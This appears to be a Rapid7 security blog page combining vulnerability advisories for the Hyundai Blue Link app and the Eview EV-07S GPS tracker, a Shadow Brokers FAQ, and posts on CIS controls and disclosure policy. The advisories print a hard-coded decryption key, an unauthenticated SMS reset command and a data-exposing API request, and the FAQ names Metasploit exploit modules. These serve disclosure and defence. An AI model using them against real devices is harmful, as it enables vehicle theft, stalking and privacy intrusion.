Skip navigation
All Places > Information Security > Blog
1 2 3 Previous Next

Information Security

747 posts


Due to a reliance on cleartext communications and the use of a hard-coded decryption password, two outdated versions of Hyundai Blue Link application software, 3.9.4 and 3.9.5 potentially expose sensitive information about registered users and their vehicles, including application usernames, passwords, and PINs via a log transmission feature. This feature was introduced in version 3.9.4 on December 8, 2016, and removed by Hyundai on March 6, 2017 with the release of version 3.9.6.

Affected versions of Hyundai Blue Link mobile application upload application logs to a static IP address over HTTP on port 8080. The log is encrypted using a symmetrical key, "1986l12Ov09e", which is defined in the Blue Link application (specifically,, and cannot be modified by the user.

Once decoded, the logs contain personal information, including the user's username, password, PIN, and historical GPS data about the vehicle's location. This information can be used to remotely locate, unlock and start the associated vehicle.

This vulnerability was discovered by Will Hatzer and Arjun Kumar, and this advisory was prepared in accordance with Rapid7's disclosure policy.

Product Description

The Blue Link app is compatible with 2012 and newer Hyundai vehicles. The functionality includes remote start, location services, unlocking and locking associated automobiles, and other features, documented at the vendor's web site.


This vulnerability was discovered by independent researchers William Hatzer and Arjun Kumar.

Exploitation for R7-2017-02

The potential data exposure can be exploited one user at a time via passive listening on insecure WiFi, or by standard man-in-the-middle (MitM) attack methods to trick a user into connecting to a WiFi network controlled by an attacker on the same network as the user. If this is achieved, an attacker would then watch for HTTP traffic directed at, which includes the encrypted logfile with a filename that includes the user's email address.

It would be difficult to impossible to conduct this attack at scale, since an attacker would typically need to first subvert physically local networks, or gain a privileged position on the network path from the app user to the vendor's service instance.

Vendor Statement

Hyundai Motor America (HMA) was made aware of a vulnerability in the Hyundai Blue Link mobile application by researchers at Rapid7. Upon learning of this vulnerability, HMA launched an investigation to validate the research and took immediate steps to further secure the application. HMA is not aware of any customers being impacted by this potential vulnerability.


The privacy and security of our customers is of the utmost importance to HMA. HMA continuously seeks to improve its mobile application and system security. As a member of the Automotive Information Sharing Analysis Center (Auto-ISAC), HMA values security information sharing and thanks Rapid7 for its report.


On March 6, 2017, the vendor updated the Hyundai Blue Link app to version 3.9.6, which removes the LogManager log transmission feature. In addition, the TCP service at has been disabled. The mandatory update to version 3.9.6 is available in both the standard Android and Apple app stores.

Disclosure Timeline

  • Tue, Feb 02, 2017: Details disclosed to Rapid7 by the discoverer.
  • Sun, Feb 19, 2017: Details clarified with the discoverer by Rapid7.
  • Tue, Feb 21, 2017: Rapid7 attempted contact with the vendor.
  • Sun, Feb 26, 2017: Vendor updated to v3.9.5, changing LogManager IP and port.
  • Mon, Mar 02, 2017: Vendor provided a case number, Consumer Affairs Case #10023339
  • Mon, Mar 06, 2017: Vendor responded, details discussed.
  • Mon, Mar 06, 2017: Version 3.9.6 released to the Google Play store.
  • Wed, Mar 08, 2017: Version 3.9.6 released to the Apple App Store.
  • Wed, Mar 08, 2017: Details disclosed to CERT/CC by Rapid7, VU#152264 assigned.
  • Wed, Apr 12, 2017: Details disclosed to ICS-CERT by Rapid7, ICS-VU-805812 assigned.
  • Fri, Apr 21, 2017: Details validated with ICS-CERT and HMA, CVE-2017-6052 and CVE-2017-6054 assigned.
  • Tue, Apr 25, 2017: Public disclosure of R7-2017-02 by Rapid7.
  • Tue, Apr 25, 2017: ICSA-17-115-03 published by ICS-CERT.

In your organizational environment, Audit Logs are your best friend. Seriously. This is the sixth blog of the series based on the CIS Critical Security Controls. I’ll be taking you through Control 6: Maintenance, Monitoring and Analysis of Audit Logs, in helping you to understand the need to nurture this friendship and how it can bring your information security program to a higher level of maturity while helping gain visibility into the deep dark workings of your environment.


In the case of a security event or incident, real or perceived, and whether it takes place due to one of the NIST-defined incident threat vectors, or falls into the “Other” category, having the data available to investigate and effectively respond to anomalous activity in your environment, is not only beneficial, but necessary.


What this Control Covers:

This control has six sections which cover everything from NTP configuration, to verbose logging of traffic from network devices to how the organization can best leverage a SIEM for a consolidated view and action points, and how often reports need to be reviewed for anomalies.



There are many areas where this control runs alongside or directly connects to some of the other controls as discussed in other CIS Critical Control Blog posts.


How to Implement It:

Initial implementation of the different aspects of this control range in complexity from a “quick win” to full configuration of log collection, maintenance, alerting and monitoring.


Network Time Protocol: Here’s your quick win. By ensuring that all hosts on your network are using the same time source, event correlation can be accomplished in a much more streamlined fashion. We recommend leveraging the various NTP pools that are available, such as those offered from Having your systems check in to a single regionally available server on your network, which has obtained its time from the NTP pool will save you hours of chasing down information.


Reviewing and Alerting: As you can imagine, there is a potential for a huge amount of data to be sent over to your SIEM for analysis and alerting. Knowing what information to capture and retain is a huge part of the initial and ongoing configuration of the SIEM.


Fine tuning of alerts is a challenge for a lot of organizations. What is a critical alert? Who should be receiving these and how should they be alerted? What qualifies as a potential security event? SIEM manufacturers and Managed Service Providers have their pre-defined criteria, and for the most part, are able to effectively define clear use cases for what should be alerted upon, however your organization may have additional needs. Whether these needs are the result of compliance requirements or you needing to keep an eye on a specific critical system for anomalous activity, defining your use cases and ensuring that alerts are sent for the appropriate level of concern as well as having them sent to the appropriate resources is key in avoiding alert fatigue.


Events that may not require immediate notification still have to be reviewed. Most regulatory requirements state that logs should be reviewed "regularly" but remain vague on what this means. A good rule of thumb is to have logs reviewed on a weekly basis, at a minimum. While your SIEM may have the analytical capabilities to draw correlations, there will undoubtedly be items that you find that will require action.


What should I be collecting?

There is a lot of technology out there to “help” secure your environment. Everything from Active Directory auditing tools, which allow you to pull nicely formatted and predefined reports, to the network configuration management tools. There are all flavors out there that are doing the same thing that your SIEM tool can do with appropriately managed alerting and reporting. It should be able to be a one stop shop for your log data.

In a perfect world, where storage isn’t an issue, each of the following items would have security related logs sent to the SIEM.

  • Network gear
    • Switches
    • Routers
    • Firewalls
    • Wireless Controllers and their APs.
  • 3rd Party Security support platforms
    • Web proxy and filtration
    • Anti-malware solutions
    • Endpoint Security platforms (HBSS, EMET)
    • Identity Management solutions
    • IDS/IPS
  • Servers
    • Special emphasis on any system that maintains an identity store, including all Domain Controllers in a Windows environment.
    • Application servers
    • Database servers
    • Web Servers
    • File Servers – Yes, even in the age of cloud storage, file servers are still a thing, and access (allowed or denied) needs to be logged and managed.
  • Workstations
    • All security log files


This list is by no means exhaustive, and even at the level noted we are talking about large volumes of information. This information needs a home. This home needs to be equipped with adequate storage and alerting capabilities.


Local storage is an alternative, but it will not provide the correlation, alerting or retention capabilities as a full blown SIEM implementation.


There has been some great work done in helping organizations refine what information to include in log collections. Here are a few resources I have used.


SANS - ement-strategies-audit-compliance-33528


NIST SP 800-92 -


Malware Archeology -



Read more on the CIS Critical Security Controls:


What are the CIS Critical Security Controls?


The Center for Internet Security (CIS) Top 20 Critical Security Controls (previously known as the SANS Top 20 Critical Security Controls), is an industry-leading way to answer your key security question: “How can I be prepared to stop known attacks?” The controls transform best-in-class threat data into prioritized and actionable ways to protect your organization from today’s most common attack patterns.


Achievable Implementation of the CIS Critical Security Controls


The interesting thing about the critical security controls is how well they scale to work for organizations of any size, from very small to very large. They are written in easy to understand business language, so non-security people can easily grasp what they do. They cover many parts of an organization, including people, processes and technology. As a subset of the priority 1 items in the NIST 800-53 special publication, they are also highly relevant and complimentary to many established frameworks.


Leveraging Rapid7's expertise to assist your successful implementation


As part of a Rapid7 managed services unit, the Security Advisory Services team at Rapid7 specializes in security assessments for organizations. Using the CIS Critical Security Controls (formerly the SANS 20 Critical Controls) as a baseline, the team assesses and evaluates strengths and gaps, and makes recommendations on closing those gaps.


The Security Advisory Services team will be posting a blog series on each of the controls. These posts are based on our experience over the last two years of our assessment activity with the controls, and how we feel each control can be approached, implemented and evaluated. If you are interested in learning more about the CIS Critical Controls, stay tuned here as we roll out posts weekly. Thanks for your interest and we look forward to sharing our knowledge with you!


The definitive guide of all CIS Critical Security Controls

As the blog series expands, we’ll use this space to keep a running total of all the 20 CIS Critical Controls. Check back here to stay updated on each control.


Control 1: Inventory of Authorized and Unauthorized Devices

This control is split into 6 focused sections relating to network access control, automation and asset management. The control specifically addresses the need for awareness of what’s connected to your network, as well as the need for proper internal inventory management and management automation. Implementing inventory control is probably the least glamorous way to improve a security program, but if it's done right it reduces insider threat and loss risks, cleans up the IT environment and improves the other 19 controls. Learn more.


Control 2: Inventory of Authorized and Unauthorized Software

The second control is split into 4 sections, each dealing with a different aspect of software management. Much like Control 1, this control addresses the need for awareness of what’s running on your systems and network, as well as the need for proper internal inventory management. The CIS placed these controls as the "top 2" in much the same way that the NIST Cybersecurity Framework addresses them as "priority 1" controls on the 800-53 framework; inventory and endpoint-level network awareness is critical to decent incident response, protection and defense. Learn more.

Control 3: Secure Configurations for Hardware & Software

This control deals with Secure Configurations for Hardware & Software. The Critical Controls are numbered in a specific way, following a logical path of building foundations while you gradually improve your security posture and reduce your exposure. Controls 1 and 2 are foundational to understanding what inventory you have. The next step, Control 3, is all about shrinking that attack surface by securing the inventory in your network. Learn more.


Control 4: Continuous Vulnerability Assessment & Remediation

Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities. Control 4 challenges you to understand why vulnerability management and remediation is important to your overall security maturity. Learn more.


Control 5: Controlled Use of Administrative Privilege

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren’t thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk.  Discover how reducing or controlling administrative privilege and access can reduce the risk of an attacker comprising your sensitive information. Learn more.

Rapid7 has long been a champion of coordinated vulnerability disclosure and handling processes as they play a critical role in both strengthening risk management practices and protecting security researchers. We not only use coordinated disclosure processes in our own vulnerability disclosure and receiving activities, but also advocate for broader adoption in industry and in government policies.


Building on this, we recently joined forces with other members of the security community to urge NIST and NTIA (both part of the U.S. Dept. of Commerce) to promote adoption of coordinated vulnerability disclosure processes. In each of these two most recent filings, Rapid7 was joined by a coalition of approximately two dozen (!!) like-minded cybersecurity firms, civil society organizations, and individual researchers.


  • Joint comments to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, available here.


  • Joint comments to the National Telecommunications and Information Administration's (NTIA) "Green Paper" on the Internet of Things, available here.


The goal of the comments is for these agencies to incorporate coordinated vulnerability disclosure and handling processes into official policy positions on IoT security (in the case of NTIA) and cybersecurity guidance to other organizations (in the case of NIST). We hope this ultimately translates to broader adoption of these processes by both companies and government agencies.


What are "vuln disclosure processes" and why are they important?

Okay, first off, I really hope infosec vernacular evolves to come up with a better term than "coordinated vulnerability disclosure and handling processes" because boy that's a mouthful. But it appears to be the generally agreed-upon term.


A coordinated vulnerability disclosure and handling process is basically an organization's plan for dealing with security vulnerabilities disclosed from outside the organization. They are formal internal mechanisms for receiving, assessing, and mitigating security vulnerabilities submitted by external sources, such as independent researchers, and communicating the outcome to the vulnerability reporter and affected parties. These processes are easy to establish (relative to many other security measures) and may be tailored for an organizations' unique needs and resources. Coordinated vulnerability disclosure and handling processes are not necessarily "bug bounty programs" and may or may not offer incentives, or a guarantee of protection against liability, to vulnerability reporters.


Why are these processes important? The quantity, diversity, and complexity of vulnerabilities will prevent many organizations from detecting all vulnerabilities without independent expertise or manpower. When companies are contacted about vulnerabilities in their products or IT from unsolicited third parties, having a plan in place to get the information to the right people will lead to a quicker resolution. Security researchers disclosing vulnerabilities are also better protected when companies clarify a process for receiving, analyzing, and responding to the disclosures – being prepared helps avoid misunderstandings or fear that can lead to legal threats or conflicts.


To catch vulnerabilities they might otherwise overlook, businesses and government agencies are increasingly implementing vulnerability disclosure and handling processes, but widespread adoption is not yet the norm.


NIST Framework comments

The NIST Framework is a voluntary guidance document for organizations for managing cybersecurity risks. The Framework has seen growing adoption and recognition, and is an increasingly important resource that helps shape cybersecurity implementation in the public and private sectors. NIST proposed revisions to the Framework and solicited comments to the revisions.


In our joint comments, the coalition urged NIST to expressly incorporate vulnerability disclosure processes into the Framework. The Framework already included "external participation" components and metrics (likely directed at formal cyber threat intel sharing arrangements), but they are unclear and don't explicitly refer to vulnerability disclosure processes.


Specifically, our comments recommended that the Framework Core include a new subcategory dedicated to vulnerability disclosure processes, and to build the processes into existing subcategories on risk assessment and third party awareness. Our comments also recommended revising the "external participation" metric of the Framework Tiers to lay out a basic maturity model for vulnerability disclosure processes.


NTIA Internet of Things "Green Paper" comments

NTIA issued a “Green Paper” in late 2016 to detail its overall policies with regard to the Internet of Things, and then they solicited feedback and comments on that draft. Although the Dept. of Commerce has demonstrated its support for vulnerability disclosure and handling processes, there was little discussion about this issue in the Green Paper. The Green Paper is important because it will set the general policy agenda and priorities for the Dept. of Commerce on the Internet of Things (IoT).


In our joint comments, the coalition urged NTIA to include more comprehensive discussion vulnerability disclosure and handling processes for IoT. This will help clarify and emphasize the role of vulnerability disclosure in the Dept. of Commerce's policies on IoT security going forward.


The comments also urged NTIA to commit to actively encouraging IoT vendors to adopt vulnerability disclosure and handling processes. The Green Paper mentioned NTIA's ongoing "multistakeholder process" on vulnerability disclosure guidelines, which Rapid7 participates in, but the Green Paper did not discuss any upcoming plans for promoting adoption of vulnerability disclosure and handling processes. Our comments recommended that NTIA promote adoption among companies and government agencies in IoT-related sectors, as well as work to incorporate the processes into security guidance documents.


More coming

Rapid7 is dedicated to strengthening cybersecurity for organizations, protecting consumers, and empowering the independent security research community to safely disclose vulnerabilities they've discovered. All these goals come together on the issue of coordinated vulnerability disclosure processes. As we increasingly depend on complex and flawed software and systems, we must pave the way for greater community participation in security. Facilitating communication between technology providers and operators and independent researchers is an important step toward greater collaboration aimed at keeping users safe.


Rapid7 is thrilled to be working with so many companies, groups, and individuals to advance vulnerability disclosure and handling processes. As government agencies consider how cybersecurity fits into their missions, and how to advise the public and private sectors on what to do to best protect themselves, we expect more opportunities to come.


You can learn more about our policy engagement efforts on Rapid7's public policy page.

The Rapid7 team has been busy evaluating the threats posed by last Friday’s Shadow Broker exploit and tool release and answering questions from colleagues, customers, and family members about the release. We know that many people have questions about exactly what was released, the threat it poses, and how to respond, so we have decided to compile a list of frequently asked questions.

What’s the story?

On Friday, April 15, a hacking group known as the “Shadow Brokers” released a trove of alleged NSA data, detailing exploits and vulnerabilities in a range of technologies. The data includes information on multiple Windows exploits, a framework called Fuzzbunch for loading the exploit binaries onto systems, and a variety of post-exploitation tools.

This was understandably a cause for concern, but fortunately, none of the exploits were zero days. Many targeted older systems and the vulnerabilities they exploited were well-known, and four of the exploits targeted vulnerabilities that were patched last month.


Who are these shady characters?

The Shadow Brokers are a group that emerged in August of 2016, claiming to have information on tools used by a threat group known as Equation Group. The initial information that was leaked by the Shadow Brokers involved firewall implants and exploitation scripts targeting vendors such as Cisco, Juniper, and Topsec, which were confirmed to be real and subsequently patched by the various vendors. Shadow Brokers also claimed to have access to a larger trove of information that they would sell for 1 million bitcoins, and later lowered the amount to 10,000 bitcoins, which could be crowdfunded so that the tools would be released to the public, rather than just to the highest bidder. The Shadow Brokers have popped up from time to time over the past 9 months leaking additional information, including IP addresses used by the Equation Group and additional tools. Last week, having failed to make their price, they released the password for the encrypted archive, and the security community went into a frenzy of salivation and speculation as it raced to unpack the secrets held in the vault.


The April 15th release seems to be the culmination of the Shadow Brokers’ activity; however, it is possible that there is still additional information about the Equation Group that they have not yet released to the public.


Should you be worried?

A trove of nation state-level exploits being released for anyone to use is certainly not a good thing, particularly when they relate to the most widely-used software in the world, but the situation is not as dire as it originally seemed. There are patches available for all of the vulnerabilities, so a very good starting point is to verify that your systems are up to date on patches. Home users and small network operators likely had the patches installed automatically in the last update, but it is always good to double-check. 

If you are unsure if you are up to date on these patches, we have checks for them all in Rapid7 Nexpose and Rapid7 InsightVM. These checks are all included in the Microsoft hotfix scan template.


























If you want to ensure your patching efforts have been truly effective, or understand the impact of exploitation, you can test your exposure with several modules in Rapid7 Metasploit:












MS14-068 / CVE-2014-6324







auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh, auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff, exploits/windows/smb/ms09_050_smb2_negotiate_func_index









In addition, all of the above exploits can also be pivoted to a Meterpreter session via the DoublePulsar implant.


What else can you do to protect yourselves?

If patching is still in progress or will take a little bit longer to fully implement (we get it) then there are detections for the exploits that you can implement while patching in underway. For examples of ways to implement detections, check out this blog post from Mike Scutt.


Rapid7 InsightIDR, our solution for incident detection and response, has an active Threat Community with intelligence to help detect the use of these exploits and any resulting attacker behavior. You can subscribe to this threat in the community portal. For more on how threat intel works in InsightIDR, check out this 4-min Solution Short.


It is also important to stay aware of other activity on your network during the patching and hardening processes. It is easy to get distracted by the latest threats, and attackers often take advantage of defender preoccupation to achieve their own goals, which may or may not have anything to do with this latest tool leak.


What about that IIS 6 box we have on the public internet?

It is very easy for commentators to point fingers and say that anyone who has legacy or unsupported systems should just get rid of them, but we know that the reality is much more complicated. There will be legacy systems (IIS 6 and otherwise) in organizations that for whatever reason cannot just be replaced or updated. That being said, there are some serious issues with leaving systems that are vulnerable to these exploits publicly accessible. Three of the exploits (“EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”) will remain effective on EOL systems and the impacts are concerning enough that it is really not a good idea to have internet-facing vulnerable systems. If you are in this position we recommend coming up with a plan to update the system and to keep a very close eye on the development of this threat. Due to the sophistication of this tool set, if widespread exploitation starts then it will likely only be a matter of time before the system is compromised.


Should you be worried about the Equation Group?

The threat from Equation Group itself to most organizations is minimal, unless your organization has a very specific threat profile. Kaspersky’s initial analysis of the group lists the countries and sectors that they have seen targeted in the past. This information can help you determine if your organization may have been targeted.


While that is good news for most organizations, that doesn’t mean that there is no cause for concern. These tools appear to be very sophisticated, focusing on evading security tools such as antivirus and generating little to no logging on the systems that they target. For most organizations the larger threat is that of attackers co-opting these very sophisticated and now public exploits and other post-exploitation tools and using them to achieve their own goals. This increases the threat and makes defending against, and detecting, these tools more critical. We have seen a sharp decrease in the amount of time it take criminals to incorporate exploits into their existing operations. It will not be long before we will start to see more widespread attacks using these tools.

Where should I build my underground bunker?

While this particular threat is by no means a reason to go underground, there are plenty of other reasons that you may need to hide from the world and we believe in being prepared. That being said, building your own underground bunker is a difficult and time consuming task, so we recommend that you find an existing bunker, pitch in some money with some friends, and wait for the next inevitable bunker-level catastrophe to hit, because this isn’t it.


Build a bunker.jpg

It’s the $64,000 question in security – both figuratively and literally: where do you spend your money? Some people vote, at least initially, for risk assessment. Some for technology acquisition. Others for ongoing operations. Smart security leaders will cover all the above and more. It’s interesting though – according to a recent study titled the 2017 Thales Data Threat Report, security spending is still a bit skewed. For instance, security compliance is the top driver of security spending. One would think that business risk and common sense would be core drivers but we all know how the world works.


The Thales study also found that network and endpoint security were their top spending priorities yet 30 percent of respondents say their organizations are 'very vulnerable' or 'extremely vulnerable' to security attacks. So, people are spending money on security solutions that may not be addressing their true challenges. Perhaps more email phishing testing needs to be performed. I’m finding that to be one of the most fruitful exercises anyone can do to improve their security program – as long as it’s being done the right way. Maybe more or better security assessments are required. Only you – and the team of people in charge of security – will know what’s best. 


The mismatch of security priorities and spending is something I see all the time in my work. Security policies are documented, advanced technologies are implemented, and executives are assuming that all is well with security given all the effort and money being spent. Yet, ironically, in so many cases not a single vulnerability scan has been run, much less a formal information risk assessment has been performed. Perhaps testing has been done but maybe it wasn’t the right type of testing. Or, the right technologies have been installed but their implementation is sloppy or under-managed.


This mismatch is an issue that’s especially evident in healthcare (i.e. HIPAA compliance checkbox) but affects businesses large and small across all industries. It’s the classic case of putting the cart before the horse. I strongly believe in the concept of “you cannot secure what you don’t acknowledge”. But you first have to properly acknowledge the issues – not just buy into them because they’re “best practice”. Simply going through the motions and spending money on security will make you look busy and perhaps demonstrate to those outside of IT and security that something is being done to address your information risks. But that’s not necessarily the right thing to do.


The bottom line, don’t spend that hard-fought $64,000 on security just for the sake of security. Step back. Know what you’ve got, understand how it’s truly at risk, and then, and only then, should you do something about it. Look at the bigger picture of security – what it means for your organization and how it can best be addressed based on your specific needs rather than what someone else is eager to sell you.

Seven issues were identified with the Eview EV-07S GPS tracker, which can allow an unauthenticated attacker to identify deployed devices, remotely reset devices, learn GPS location data, and modify GPS data. Those issues are briefly summarized on the table below.


These issues were discovered by Deral Heiland of Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.


Vulnerability DescriptionR7 IDCVEExploit Vector
Unauthenticated remote factory resetR7-2016-28.1CVE-2017-5237Phone number
Remote device identificationR7-2016-28.2



Phone number range
Lack of configuration bounds checksR7-2016-28.3CVE-2017-5238Phone number
Unauthenticated access to user dataR7-2016-28.4


(server-side issue)

Web application
Authenticated user access to other users' dataR7-2016-28.5


(server-side issue)

Web application user account
Sensitive information transmitted in cleartextR7-2016-28.6CVE-2017-5239Man-in-the-Middle (MitM) Network
Web application data poisoningR7-2016-28.7


(server-side issue)

Web application


Product Description

The EV-07S is a personal GPS tracker device used for personal safety and security, described at the vendor's website as being primarily intended for tracking elderly family members; disabled and patient care; child protection; employee management; and pet and animal tracking. Test devices were acquired from Eview directly, and an example is shown below in Figure 1.


Figure 1: The EV-07S personal GPS tracker device


R7-2016-28.1: Unauthenticated remote factory reset

Given knowledge of the EV-07S's registered phone number, the EV-07S device can be reset to factory level setting by sending "RESET!" as a command in an SMS message to the device. Only the phone number is required; no password or physical access is required to accomplish this task. After a factory reset, the device can then be reconfigured remotely via SMS messages without need of password. The product manual states this functionality, so it appears to be a fundamental design flaw with regard to secure configuration.


Mitigation for R7-2016-28.1

A vendor-supplied patch should prevent the device from allowing unauthenticated factory reset without having physical access to the device.


Absent a patch, users should regularly check their device to ensure the configuration has not be deleted or altered.


R7-2016-28.2: Remote device identification

The EV-07S device, once set up with a password, should not respond to any SMS queries sent to the device's phone number. According to the user manual, no password is needed to send "reboot" and "RESET!" commands to the device. Testing showed, in spite of user manual statement, that the "reboot" command required a password if device is set up for authentication. Further manual fuzzing test via SMS reveled that the command "REBOOT!" will cause the device to respond with the message "Format error!".


Due to providing this negative response, a malicious actor could use this command to enumerate all devices by trying all likely phone numbers, commonly known as a war dialing operation, using SMS messages containing the "REBOOT!" command.



Figure 2: SMS command response on password protected device


Mitigation for R7-2016-28.2

A vendor-supplied patch should disable the response from the "REBOOT!" command when password protection is enabled.


R7-2016-28.3: Lack of configuration bounds checks

Several input configuration fields were discovered to not be performing proper bounds checks on incoming SMS messages. If a device's phone number is known to an attacker, this lack of bounds checking allows the overly long input of one configuration setting to overwrite data of another setting. An example of this is shown in Figure 3, where the "Authorized Number" setting A1 is used to overwrite setting B1:



Figure 3: Configuration Setting Overflow Via SMS Message


Mitigation for R7-2016-28.3

A vendor-supplied patch should implement bounds checks and input sanitization on all entered configuration data.


Absent a vendor-supplied patch, users should be mindful of entering any values of excessive length. In the case with Authorized Number setting anything over 20 characters will overwrite the next setting in line.


R7-2016-28.4: Unauthenticated access to user data

A malicious actor can gain access to user data including account name, TrackerID and device IMEI id. This is done by posting userId=5XXXX&trackerName=&type=allTrackers with a the target's userID number to the API  at .  An example of this shown below in Figure 4:



Figure 4: HTTP post to gain access to user data


Given the small keyspace involved with guessing valid user IDs of 5 digits, it appears trivial to determine all valid user IDs.


Mitigation for R7-2016-28.4

A vendor-supplied patch on the vendor web application should prevent unauthenticated access to individual user data.


Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.


R7-2016-28.5: Authenticated access to other users' data

An authenticated user can gain access to others users configuration and device GPS data if they know or guess a valid userId, device IMEI or TrackerID. The following three examples (Figures 5 through 7) show this level of access from one authenticated account being able to access another account's data.



Figure 5: Access to another user's configuration data



Figure 6: Access to Another users Device GPS Data



Figure 7: Access to Another Users GPS Tracker Configuration


Mitigation for R7-2016-28.5

A vendor-supplied patch should prevent access to other users data.


Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.


R7-2016-28.6:  Sensitive information transmitted in cleartext

The web application used for realtime tracking web application, hosted at , does not utilize SSL/TLS encryption for HTTP services. Also the EV-07S device passes IMEI and GPS data to this website over the Internet on TCP port 5050 without any encryption. An example of this captured unencrypted data is show below in Figure 8:



Figure 8: Unencrypted Transfer of Information From Device Over Port 5050


Mitigation for R7-2016-28.6

A vendor-supplied patch on both the server and the client should enable encrypted transfer of data to website, as well as an update of the website to enable HTTPS service and serve these pages only over HTTPS.


Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.


R7-2016-28.7:  Data poisoning

An unauthenticated attacker can poison the realtime tracking data by injecting device data similar to the data structure shown above in Figure 8 to the server at over TCP port 5050. The attacker can do this only if they know a device's IMEI number, but that data is learnable through mechanisms described above.


An example of this is shown in Figure 9, where the device's realtime tracking data was poisoned to make the device appear to be Moscow, Russia (it was not).



Figure 9: Real time tracking data poisoned


Mitigation for R7-2016-28.7

A vendor-supplied patch should enable authentication before allowing device data to be posted to the site on TCP port 5050.


Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.


Disclosure Timeline

  • Mon, Dec 12, 2016: Initial contact made to the vendor.
  • Tue, Dec 20, 2016: Vendor responded and details provided to
  • Tue, Dec 27, 2016: Disclosure to CERT/CC, VU#375851 assigned.
  • Wed, Mar 08, 2017: CVEs assigned in conjunction with CERT/CC.
  • Mon, Mar 27, 2017: Vulnerability disclosure published.

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren’t thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk. Therefore it is an important control, and the conversation around why it is important is also important. We’ll talk about both.


remote-control-149842_960_720.pngMisuse of privilege is a primary method for attackers to land and expand inside networks. Two very common attacks rely on privilege to execute. The first is when a user running with privilege is tricked into opening a malicious attachment, or gets malware from a drive-by website, such as malware which loads silently in the background. Privileged accounts just make these attacks succeed quickly, and user machines can be controlled, or keylogging can be installed, or running malicious processes can be hidden from view.


The second common technique is the elevation of privilege when guessing or cracking a password for an administrative user and gaining access on a target machine. Especially if the password policy is weak (8 characters is not sufficient!) or not enforced, the risk increases.


What it is

Reducing administrative privilege specifically means running services or accounts without admin level access all the time. This does not mean that no one should have admin, it means admin privilege should be heavily restricted to only those users whose jobs, and more specifically tasks, require admin privilege.


Regular, normal users of a system should never require admin privilege to do daily tasks. Superusers of a system might require admin access for certain tasks, but don’t necessarily need it all the time. Even system administrators do not require admin level access 100% of the time to do their jobs. Do you need admin access to read & send emails? Or search the web?



How to implement it

There’s a lot of different ways to implement restrictions on admin privilege. You are first going to have to deal with the political issues of why to do this. Trust me, addressing this up front saves you a lot of heartache later on.


The political stuff

Case #1: All users have admin, either local admin and/or admin account privileges


My first question, when I see this happening in any organization, is “why do they need this?”


Typical answers are:

  • They need to install software [HINT: no they don’t.]
  • Applications might fail to work [Possible but unlikely, the app just might be installed improperly.]
  • They need it to print !!! [No.]
  • My executives demand it [They demand a lot in IT without understanding. Help them understand. See below.]
  • Why not? [Seriously?]


All of these Some of these are valid responses. The problem is we don’t understand the root issue that’s driving the reason that everyone needs admin level access to do their daily duties. And this is probably true of many organizations. It’s simpler just to give admin access because things will then work, but you create loads of risk when you do this. You have to take the time to determine what functions actually need the access, and remove this access from those functions that don’t require it, to lower the risk and the attack surface.


All of these responses speak to worries about not being able to do a business function when they need to. They also imply that the people in charge of approving these permissions really don’t understand the risks associated with imparting them. We need to get them to understand the lowered risks of possibly needing admin once or twice, and much higher risks of having it when attackers strike.


Case #2: Your admins say they have to have it “to do their jobs”


I don’t disagree with this statement. Admins do need admin rights to do some tasks. But not every task calls for it. Do this exercise: list all the daily tasks an admin does on an average day. Then, mark each task which does not require admin privilege to accomplish. Show that list to the person responsible for managing risk in your organization. Then simply create a separate, normal user account for your admins, and require them to use it for all those tasks that are marked. For all other tasks, they escalate into their admin account and then de-escalate when done. It's an extra step, and it is a secure one.


The conversation


Now have the conversation. It may be painful. I have actually been in meetings where people got so mad they threw things, and would be in tears when we told them we were “taking away” their privilege. This is why we say “reducing” or "controlling.” These are important words. The phrase is “we’re reducing/controlling risk by allowing you to use your privilege only for tasks that require it.” For executives that demand it, point out they are the highest risk to the organization due to their status and are frequently a high value target sought by attackers.


Then you support your conversation with information from around the web, whitepapers, studies, anything that helps drive your point.


For example this article from Avecto illustrates 97% of critical Windows vulnerabilities are mitigated when reducing admin privilege. Allowing you to focus on the remaining 3%, and be more effective. Search around, there’s lots more good supporting material.


This does not need to be an expensive exercise. Using techniques like Windows delegation of authority, you can give administrative privilege to users for specific tasks, like delegating to your help desk the ability to disable accounts or move them to different OUs. They don’t need full admin to do this. On linux systems, using sudo instead of root interactively is much less risky.


If you are a compliance-driven organization, most compliance requirements state reduction of admin is required as part of access controls. Here’s a brief glimpse of some compliance requirements that are addressed by Control 5:


  • PCI Compliance Objective “Implement strong access control measures”
    • Sections 7.1, 7.2, 7.3, 8.1, 8.2, 8.3, 8.7


  • HIPAA Compliance 164.308(a)(4)(ii)(B)
    • Rights and/or privileges should be granted to authorized users based on a set of access rules that the covered entity is required to implement as part of § 164.308(a)(4), the Information Access Management standard under the Administrative Safeguards section of the Rule.


  • FFIEC (Federal Financial Institutions Examination Council)
    • Authentication and Access Controls


The technical stuff

Reducing admin privilege supports the Pareto principle, or the 80/20 rule. Effectively, reducing admin privilege, combined with the first four CIS critical security controls, can reduce the risks in your organization by 80% or more. This allows you to focus on the remaining 20%. It’s very likely the risk factor reduction is even higher! The Australian Signals Defence Directorate lists reducing admin in its Top 4 Mitigation Strategies, along with elements from Control 2 by using application whitelisting, and Control 4 by having an ongoing patching program.


Here is Microsoft’s guidance on implementing Least-Privilege Administrative Models. If you use Active Directory and are on a Windows domain this is very helpful in making meaningful changes to your admin models.


